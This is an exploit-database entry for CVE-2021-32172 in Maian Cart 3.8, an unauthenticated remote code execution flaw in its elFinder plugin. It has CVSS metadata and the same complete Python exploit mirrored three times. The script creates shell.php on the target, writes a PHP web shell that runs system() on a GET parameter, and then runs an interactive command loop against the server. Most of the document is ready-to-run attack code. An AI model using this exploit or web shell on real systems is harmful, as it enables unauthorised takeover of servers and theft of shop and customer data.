Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)

2021-10-08T00:00:00

Description

{"id": "EDB-ID:50394", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)", "description": "", "published": "2021-10-08T00:00:00", "modified": "2021-10-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.exploit-db.com/exploits/50394", "reporter": "DreyAnd", "references": [], "cvelist": ["2021-32172", "CVE-2021-32172"], "immutableFields": [], "lastseen": "2022-05-13T17:35:05", "viewCount": 109, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-32172"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164445"]}, {"type": "zdt", "idList": ["1337DAY-ID-36878"]}], "rev": 4}, "score": {"value": 6.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-32172"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164445"]}, {"type": "zdt", "idList": ["1337DAY-ID-36878"]}]}, "exploitation": null, "vulnersScore": 6.6}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": "https://www.exploit-db.com/download/50394", "sourceData": "# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)\r\n# Date: 27.11.2020 19:35\r\n# Tested on: Ubuntu 20.04 LTS\r\n# Exploit Author(s): DreyAnd, purpl3\r\n# Software Link: https://www.maiancart.com/download.html\r\n# Vendor homepage: https://www.maianscriptworld.co.uk/\r\n# Version: Maian Cart 3.8\r\n# CVE: CVE-2021-32172\r\n\r\n#!/usr/bin/python3\r\n\r\nimport argparse\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport sys\r\nimport json\r\nimport time\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"host\", help=\"Host to exploit (with http/https prefix)\")\r\nparser.add_argument(\"dir\", help=\"default=/ , starting directory of the\r\nmaian-cart instance, sometimes is placed at /cart or /maiancart\")\r\nargs = parser.parse_args()\r\n\r\n#args\r\n\r\nhost = sys.argv[1]\r\ndirectory = sys.argv[2]\r\n\r\n#CREATE THE FILE\r\n\r\nprint(\"\\033[95mCreating the file to write payload to...\\n\\033[00m\", flush=True)\r\ntime.sleep(1)\r\n\r\ntry:\r\n r = requests.get(f\"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw\")\r\n print(r.text)\r\n if \"added\" in r.text:\r\n print(\"\\033[95mFile successfully created.\\n\\033[00m\")\r\n else:\r\n print(\"\\033[91mSome error occured.\\033[00m\")\r\n\r\nexcept (requests.exceptions.RequestException):\r\n print(\"\\033[91mThere was a connection issue. Check if you're\r\nconnected to wifi or if the host is correct\\033[00m\")\r\n\r\n#GET THE FILE ID\r\n\r\ntime.sleep(1)\r\n\r\nfile_response = r.text\r\nsoup = BeautifulSoup(file_response,'html.parser')\r\nsite_json=json.loads(soup.text)\r\nhash_id = [h.get('hash') for h in site_json['added']]\r\nfile_id = str(hash_id).replace(\"['\", \"\").replace(\"']\", \"\")\r\n\r\n\r\nprint(\"\\033[95mGot the file id: \", \"\\033[91m\", file_id , \"\\033[00m\")\r\nprint(\"\\n\")\r\n\r\n#WRITE TO THE FILE\r\n\r\nprint(\"\\033[95mWritting the payload to the file...\\033[00m\")\r\nprint(\"\\n\")\r\ntime.sleep(1)\r\n\r\nheaders = {\r\n \"Accept\": \"application/json, text/javascript, /; q=0.01\",\r\n \"Accept-Language\" : \"en-US,en;q=0.5\",\r\n \"Content-Type\" : \"application/x-www-form-urlencoded; charset=UTF-8\",\r\n \"X-Requested-With\" : \"XMLHttpRequest\",\r\n \"Connection\" : \"keep-alive\",\r\n \"Pragma\" : \"no-cache\",\r\n \"Cache-Control\" : \"no-cache\",\r\n}\r\n\r\ndata = f\"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E\"\r\n\r\ntry:\r\n write = requests.post(f\"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder\",\r\nheaders=headers, data=data)\r\n print(write.text)\r\nexcept (requests.exceptions.RequestException):\r\n print(\"\\033[91mThere was a connection issue. Check if you're\r\nconnected to wifi or if the host is correct\\033[00m\")\r\n\r\n\r\n#EXECUTE THE PAYLOAD\r\n\r\nprint(\"\\033[95mExecuting the payload...\\033[00m\")\r\nprint(\"\\n\")\r\ntime.sleep(1)\r\n\r\nexec_host = f\"{host}{directory}/product-downloads/shell.php\"\r\n\r\nprint(f\"\\033[92mGetting a shell. To stop it, press CTRL + C. Browser\r\nurl: {host}{directory}/product-downloads/shell.php?cmd=\\033[00m\")\r\ntime.sleep(2)\r\n\r\nwhile True:\r\n def main():\r\n execute = str(input(\"$ \"))\r\n e = requests.get(f\"{exec_host}?cmd={execute}\")\r\n print(e.text)\r\n\r\n try:\r\n if __name__ == \"__main__\":\r\n main()\r\n except:\r\n exit = str(input(\"Do you really wish to exit? Y/N? \"))\r\n\r\n if exit == \"Y\" or exit ==\"y\":\r\n print(\"\\033[91mExit detected. Removing the shell...\\033[00m\")\r\n remove =\r\nrequests.get(f\"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets%5B%5D={file_id}\")\r\n print(\"\\033[91m\" , remove.text, \"\\033[00m\")\r\n print(\"\\033[91mBye!\\033[00m\")\r\n sys.exit(1)\r\n else:\r\n main()", "osvdbidlist": [], "exploitType": "webapps", "verified": false}

{"packetstorm": [{"lastseen": "2021-10-08T16:03:43", "description": "", "cvss3": {}, "published": "2021-10-08T00:00:00", "type": "packetstorm", "title": "Maian-Cart 3.8 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-32172"], "modified": "2021-10-08T00:00:00", "id": "PACKETSTORM:164445", "href": "https://packetstormsecurity.com/files/164445/Maian-Cart-3.8-Remote-Code-Execution.html", "sourceData": "`# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated) \n# Date: 27.11.2020 19:35 \n# Tested on: Ubuntu 20.04 LTS \n# Exploit Author(s): DreyAnd, purpl3 \n# Software Link: https://www.maiancart.com/download.html \n# Vendor homepage: https://www.maianscriptworld.co.uk/ \n# Version: Maian Cart 3.8 \n# CVE: CVE-2021-32172 \n \n#!/usr/bin/python3 \n \nimport argparse \nimport requests \nfrom bs4 import BeautifulSoup \nimport sys \nimport json \nimport time \n \nparser = argparse.ArgumentParser() \nparser.add_argument(\"host\", help=\"Host to exploit (with http/https prefix)\") \nparser.add_argument(\"dir\", help=\"default=/ , starting directory of the \nmaian-cart instance, sometimes is placed at /cart or /maiancart\") \nargs = parser.parse_args() \n \n#args \n \nhost = sys.argv[1] \ndirectory = sys.argv[2] \n \n#CREATE THE FILE \n \nprint(\"\\033[95mCreating the file to write payload to...\\n\\033[00m\", flush=True) \ntime.sleep(1) \n \ntry: \nr = requests.get(f\"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw\") \nprint(r.text) \nif \"added\" in r.text: \nprint(\"\\033[95mFile successfully created.\\n\\033[00m\") \nelse: \nprint(\"\\033[91mSome error occured.\\033[00m\") \n \nexcept (requests.exceptions.RequestException): \nprint(\"\\033[91mThere was a connection issue. Check if you're \nconnected to wifi or if the host is correct\\033[00m\") \n \n#GET THE FILE ID \n \ntime.sleep(1) \n \nfile_response = r.text \nsoup = BeautifulSoup(file_response,'html.parser') \nsite_json=json.loads(soup.text) \nhash_id = [h.get('hash') for h in site_json['added']] \nfile_id = str(hash_id).replace(\"['\", \"\").replace(\"']\", \"\") \n \n \nprint(\"\\033[95mGot the file id: \", \"\\033[91m\", file_id , \"\\033[00m\") \nprint(\"\\n\") \n \n#WRITE TO THE FILE \n \nprint(\"\\033[95mWritting the payload to the file...\\033[00m\") \nprint(\"\\n\") \ntime.sleep(1) \n \nheaders = { \n\"Accept\": \"application/json, text/javascript, /; q=0.01\", \n\"Accept-Language\" : \"en-US,en;q=0.5\", \n\"Content-Type\" : \"application/x-www-form-urlencoded; charset=UTF-8\", \n\"X-Requested-With\" : \"XMLHttpRequest\", \n\"Connection\" : \"keep-alive\", \n\"Pragma\" : \"no-cache\", \n\"Cache-Control\" : \"no-cache\", \n} \n \ndata = f\"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E\" \n \ntry: \nwrite = requests.post(f\"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder\", \nheaders=headers, data=data) \nprint(write.text) \nexcept (requests.exceptions.RequestException): \nprint(\"\\033[91mThere was a connection issue. Check if you're \nconnected to wifi or if the host is correct\\033[00m\") \n \n \n#EXECUTE THE PAYLOAD \n \nprint(\"\\033[95mExecuting the payload...\\033[00m\") \nprint(\"\\n\") \ntime.sleep(1) \n \nexec_host = f\"{host}{directory}/product-downloads/shell.php\" \n \nprint(f\"\\033[92mGetting a shell. To stop it, press CTRL + C. Browser \nurl: {host}{directory}/product-downloads/shell.php?cmd=\\033[00m\") \ntime.sleep(2) \n \nwhile True: \ndef main(): \nexecute = str(input(\"$ \")) \ne = requests.get(f\"{exec_host}?cmd={execute}\") \nprint(e.text) \n \ntry: \nif __name__ == \"__main__\": \nmain() \nexcept: \nexit = str(input(\"Do you really wish to exit? Y/N? \")) \n \nif exit == \"Y\" or exit ==\"y\": \nprint(\"\\033[91mExit detected. Removing the shell...\\033[00m\") \nremove = \nrequests.get(f\"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets%5B%5D={file_id}\") \nprint(\"\\033[91m\" , remove.text, \"\\033[00m\") \nprint(\"\\033[91mBye!\\033[00m\") \nsys.exit(1) \nelse: \nmain() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164445/maiancart38-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2021-12-03T01:51:05", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "zdt", "title": "Maian-Cart 3.8 - Remote Code Execution (Unauthenticated) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32172"], "modified": "2021-10-08T00:00:00", "id": "1337DAY-ID-36878", "href": "https://0day.today/exploit/description/36878", "sourceData": "# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)\n# Tested on: Ubuntu 20.04 LTS\n# Exploit Author(s): DreyAnd, purpl3\n# Software Link: https://www.maiancart.com/download.html\n# Vendor homepage: https://www.maianscriptworld.co.uk/\n# Version: Maian Cart 3.8\n# CVE: CVE-2021-32172\n\n#!/usr/bin/python3\n\nimport argparse\nimport requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport json\nimport time\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"host\", help=\"Host to exploit (with http/https prefix)\")\nparser.add_argument(\"dir\", help=\"default=/ , starting directory of the\nmaian-cart instance, sometimes is placed at /cart or /maiancart\")\nargs = parser.parse_args()\n\n#args\n\nhost = sys.argv[1]\ndirectory = sys.argv[2]\n\n#CREATE THE FILE\n\nprint(\"\\033[95mCreating the file to write payload to...\\n\\033[00m\", flush=True)\ntime.sleep(1)\n\ntry:\n r = requests.get(f\"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw\")\n print(r.text)\n if \"added\" in r.text:\n print(\"\\033[95mFile successfully created.\\n\\033[00m\")\n else:\n print(\"\\033[91mSome error occured.\\033[00m\")\n\nexcept (requests.exceptions.RequestException):\n print(\"\\033[91mThere was a connection issue. Check if you're\nconnected to wifi or if the host is correct\\033[00m\")\n\n#GET THE FILE ID\n\ntime.sleep(1)\n\nfile_response = r.text\nsoup = BeautifulSoup(file_response,'html.parser')\nsite_json=json.loads(soup.text)\nhash_id = [h.get('hash') for h in site_json['added']]\nfile_id = str(hash_id).replace(\"['\", \"\").replace(\"']\", \"\")\n\n\nprint(\"\\033[95mGot the file id: \", \"\\033[91m\", file_id , \"\\033[00m\")\nprint(\"\\n\")\n\n#WRITE TO THE FILE\n\nprint(\"\\033[95mWritting the payload to the file...\\033[00m\")\nprint(\"\\n\")\ntime.sleep(1)\n\nheaders = {\n \"Accept\": \"application/json, text/javascript, /; q=0.01\",\n \"Accept-Language\" : \"en-US,en;q=0.5\",\n \"Content-Type\" : \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"X-Requested-With\" : \"XMLHttpRequest\",\n \"Connection\" : \"keep-alive\",\n \"Pragma\" : \"no-cache\",\n \"Cache-Control\" : \"no-cache\",\n}\n\ndata = f\"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E\"\n\ntry:\n write = requests.post(f\"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder\",\nheaders=headers, data=data)\n print(write.text)\nexcept (requests.exceptions.RequestException):\n print(\"\\033[91mThere was a connection issue. Check if you're\nconnected to wifi or if the host is correct\\033[00m\")\n\n\n#EXECUTE THE PAYLOAD\n\nprint(\"\\033[95mExecuting the payload...\\033[00m\")\nprint(\"\\n\")\ntime.sleep(1)\n\nexec_host = f\"{host}{directory}/product-downloads/shell.php\"\n\nprint(f\"\\033[92mGetting a shell. To stop it, press CTRL + C. Browser\nurl: {host}{directory}/product-downloads/shell.php?cmd=\\033[00m\")\ntime.sleep(2)\n\nwhile True:\n def main():\n execute = str(input(\"$ \"))\n e = requests.get(f\"{exec_host}?cmd={execute}\")\n print(e.text)\n\n try:\n if __name__ == \"__main__\":\n main()\n except:\n exit = str(input(\"Do you really wish to exit? Y/N? \"))\n\n if exit == \"Y\" or exit ==\"y\":\n print(\"\\033[91mExit detected. Removing the shell...\\033[00m\")\n remove =\nrequests.get(f\"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets%5B%5D={file_id}\")\n print(\"\\033[91m\" , remove.text, \"\\033[00m\")\n print(\"\\033[91mBye!\\033[00m\")\n sys.exit(1)\n else:\n main()\n", "sourceHref": "https://0day.today/exploit/36878", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T18:19:22", "description": "Maian Cart v3.8 contains a preauthorization remote code execution (RCE) exploit via a broken access control issue in the Elfinder plugin.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T11:15:00", "type": "cve", "title": "CVE-2021-32172", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32172"], "modified": "2021-10-15T15:31:00", "cpe": ["cpe:/a:maianscriptworld:maian_cart:3.8"], "id": "CVE-2021-32172", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-32172", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:*"]}]}

Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)

Description

Related